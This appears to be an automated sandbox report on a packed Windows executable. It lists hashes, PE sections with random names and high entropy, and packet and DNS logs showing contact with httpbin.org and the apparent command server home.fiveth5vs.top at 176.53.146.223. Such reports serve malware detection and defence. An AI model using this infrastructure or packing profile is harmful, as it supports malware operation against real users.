                            File name:JbN2WYseAr.exe
                            File size:4'512'256 bytes
                            MD5:3168cdb0691e91fc0109d3d5e854b7b1
                            SHA1:b29e09e7a8545b5471027b9b2a7e893e5266d727
                            SHA256:4ba12035398519562e56cf4b0a0a2e9dae54ec66ee9d54fc474d3e5fff8bef4f
                            SHA512:15c8d2c4c9098736edd486d5e0aa32f6e5011fb8655ed24980ada516f56812553d5025e4de67e401fcab92b0c15d883ccb9ccfe597440bd56aebdbdba4880f51
                            SSDEEP:98304:XzYulmALi/4srDBS0hL9RZL+VWYkBsF49:Xlk/4eBS0N9RZmloB
                            TLSH:E22633EAEF4338A2E52E82F2F0C7BC94313486A1C44DD568C5254AF73297799ED499F0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..K...s..2............K...@...................................E...@... ............................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x1069000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x677235C7 [Mon Dec 30 05:55:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:
                                Instruction
                                jmp 00007F953D187D1Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x70505f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x704000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x730800 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc67190 | 0x10 | ptayyfsq
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc67140 | 0x18 | ptayyfsq
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x703000 | 0x289a00 | fc490f20bd55eef8331a794b53e9a64c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x704000 | 0x1ac | 0x200 | a08f0a40a9819678b93e653ded2cdd8e | False | 0.580078125 | data | 4.582504410327368 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x705000 | 0x1000 | 0x200 | 0ff3b278c147647c2093aaa19ab35725 | False | 0.166015625 | data | 1.1569718486953509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x706000 | 0x3a1000 | 0x200 | 720320e89981314a5c02c8618741b17f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ptayyfsq | 0xaa7000 | 0x1c1000 | 0x1c0400 | 8ee07286b55721071feb20900eac8162 | False | 0.9943666559188511 | data | 7.95564888988546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
htlvnmme | 0xc68000 | 0x1000 | 0x400 | 48593edd913403109fa2749590572e3c | False | 0.7900390625 | data | 6.1596644462510595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc69000 | 0x3000 | 0x2200 | bfae1b9be9ff784303962903db9b97cf | False | 0.07628676470588236 | DOS executable (COM) | 0.7628984701205439 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc671a0 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 09:51:13.802500010 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.805002928 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.805073023 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.806021929 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806112051 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806122065 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806130886 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806191921 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806209087 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806262016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806271076 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806427002 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806436062 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806483984 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806493044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806591034 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.808854103 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.808927059 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.809912920 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.809921980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810014009 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810029030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810132980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810151100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810240984 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810297966 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810369015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810384035 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810471058 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810480118 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810503960 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810513020 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810550928 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810559034 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810590029 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810597897 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810651064 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810659885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810667038 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810673952 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810697079 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810703993 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810784101 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810800076 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810816050 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810883045 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810914040 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810929060 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811057091 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811065912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811074018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811081886 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811108112 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811116934 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811161041 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811177015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811233044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811240911 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811345100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811352968 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811362028 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811372042 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811388016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811395884 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811410904 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811418056 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811465025 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811472893 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811517954 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811525106 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811572075 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813774109 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813790083 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813908100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813936949 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814136028 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814176083 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814294100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814301968 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814322948 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814352989 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814410925 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814419031 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814450979 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814459085 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814512014 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814519882 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814548969 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814630985 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814639091 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814682007 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814691067 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814759016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814766884 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814815044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814822912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814853907 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814914942 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814923048 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814930916 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815036058 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815046072 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815057993 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815064907 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815078974 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815087080 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815125942 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815146923 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815175056 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815190077 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815248013 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815293074 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815331936 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815376997 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815387011 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815419912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815473080 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815480947 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815522909 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815531015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815566063 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815603018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815653086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815665007 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.834889889 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.834980011 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.839847088 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.839898109 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.839941978 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.839982033 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840118885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840128899 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840176105 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840199947 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840300083 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840308905 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840328932 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840337038 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840389013 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840398073 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840423107 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840431929 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840473890 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840483904 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840503931 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840512037 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840532064 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840539932 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840610981 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840619087 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840626955 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840636015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840692043 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840699911 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840708017 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840715885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840732098 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840739965 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840754986 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840768099 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840799093 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840810061 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840812922 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840872049 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840882063 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840893030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840904951 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840914965 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840929985 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840938091 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840959072 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840969086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841016054 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841025114 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841037035 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841044903 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841059923 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841067076 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841094971 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.843569040 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.848434925 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848457098 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848582029 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848589897 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848634958 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848658085 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848784924 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848793030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848803043 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848810911 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848826885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848846912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848893881 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848903894 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848953009 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848961115 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848974943 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848983049 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849021912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849030018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849071980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849080086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849140882 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849148989 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849164963 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849172115 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849181890 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849246025 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849256039 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849263906 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849284887 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849292040 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849340916 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849349976 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849373102 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849380016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849406958 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849416018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849457026 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849464893 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.894916058 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:18.070982933 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:18.071408987 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:18.076380014 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:18.076442003 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.296066046 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.301042080 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:19.301131964 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.301450968 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.306386948 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.142997980 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.143675089 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.149157047 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.149245977 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.471368074 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.476190090 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.476274967 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.476593018 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.481359959 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:21.518542051 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:21.519051075 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:21.523968935 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:21.524029970 CET4976680192.168.2.10176.53.146.223
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 09:51:10.109987974 CET5238653192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:10.110043049 CET5238653192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:10.117393970 CET53523861.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:10.117441893 CET53523861.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:12.478568077 CET5238953192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:12.478719950 CET5238953192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:13.263524055 CET53523891.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:13.263552904 CET53523891.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:18.190182924 CET5239153192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:18.190182924 CET5239153192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:18.419943094 CET53523911.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:19.295010090 CET53523911.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:20.204910994 CET5239353192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:20.204988003 CET5239353192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:20.434623957 CET53523931.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:20.470405102 CET53523931.1.1.1192.168.2.10
                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                 Dec 31, 2024 09:51:10.109987974 CET | 192.168.2.10 | 1.1.1.1 | 0xcdb9 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:10.110043049 CET | 192.168.2.10 | 1.1.1.1 | 0x24b5 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                 Dec 31, 2024 09:51:12.478568077 CET | 192.168.2.10 | 1.1.1.1 | 0xcfbd | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:12.478719950 CET | 192.168.2.10 | 1.1.1.1 | 0x4a8b | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                                 Dec 31, 2024 09:51:18.190182924 CET | 192.168.2.10 | 1.1.1.1 | 0x255f | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:18.190182924 CET | 192.168.2.10 | 1.1.1.1 | 0x3ee2 | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                                 Dec 31, 2024 09:51:20.204910994 CET | 192.168.2.10 | 1.1.1.1 | 0x2f7c | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:20.204988003 CET | 192.168.2.10 | 1.1.1.1 | 0xc93 | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                 Dec 31, 2024 09:51:10.117393970 CET | 1.1.1.1 | 192.168.2.10 | 0xcdb9 | No error (0) | httpbin.org | (none) | 34.200.57.114 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:10.117393970 CET | 1.1.1.1 | 192.168.2.10 | 0xcdb9 | No error (0) | httpbin.org | (none) | 34.197.122.172 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:13.263524055 CET | 1.1.1.1 | 192.168.2.10 | 0xcfbd | No error (0) | home.fiveth5vs.top | (none) | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:51:19.295010090 CET | 1.1.1.1 | 192.168.2.10 | 0x255f | No error (0) | home.fiveth5vs.top | (none) | 176.53.146.223 | A (IP address) | IN (0x0001) | false
